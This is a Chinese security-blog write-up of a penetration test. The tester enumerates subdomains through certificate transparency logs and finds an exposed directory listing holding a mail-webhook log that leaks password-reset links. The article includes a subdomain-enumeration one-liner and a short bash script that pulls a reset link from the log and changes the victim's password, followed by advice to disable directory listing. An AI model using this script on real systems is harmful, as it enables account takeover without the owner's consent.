回归最本质的信息安全

;

渗透测试实战:利用列目录漏洞重置密码

2018年1月11日发布

57,699
0
1

导语:列目录到帐户密码重置

列目录是最常见的错误配置之一,列目录漏洞到底影响多严重,取决于关键性文件的出现。

最近,我在渗透测试中,我遇到了一个有趣的目录列表,并且可以利用它。通过枚举,我发现了一个子域,这是分段服务器,并可以通过互联网访问。

[nishaanthguna:~/essentials]$ curl --silent https://crt.sh/?q=%.domain.com | sed 's/</?[^>]+>//g' | grep -i domain.com | tail -n +9 | cut -d ">" -f2 | cut -d "<" -f1
      www.domain.com
      blog.domain.com
      stag.domain.co

在进行端口扫描时,发现端口8080已打开,并有一个目录列表,我发现有个log日志。

从log中,我发现日志不仅泄露了个人和开发人员的电子邮件地址,还有重置密码链接。像这样的东西。

日志文件中,可能出现这样的功能场景:

1.攻击者使用从日志中获取的电子邮件地址,并使用“忘记密码”功能重置密码。

2.受害者点击发送到他们的电子邮件地址的链接。

3.攻击者获取密码重置令牌,因为目录列表并重置密码。

我写了一个快速的脚本来查看mailgun-webhook.log文件,搜索重置链接并自动重置密码。

curl https://domain.com/mailgun-webhook.log | tee direct.txt
if grep -Fxq "reset" direct.txt
then
 echo "[+]Found a Password Reset link"
 link=$(cat direct.txt | grep -i reset | cut -d "," -f6  |
 cut -d "" -f1 | head -n 1)
 curl '$link'-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)'
 --data 'password=testpassword%21%21&confirmation=testpassword%21%21' --compressed
 echo "[+]Password changed to testpassword!!"
else
 echo "[-]Reset link not found"
fi

建议禁用目录列表,不要以明文形式存储敏感信息,例如凭证,密码重置链接,API密钥。

如若转载,请注明原文地址: http://www.4hou.com/penetration/9801.html

点赞 1
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

愣娃

这个人很懒,什么也没留下

发私信

发表评论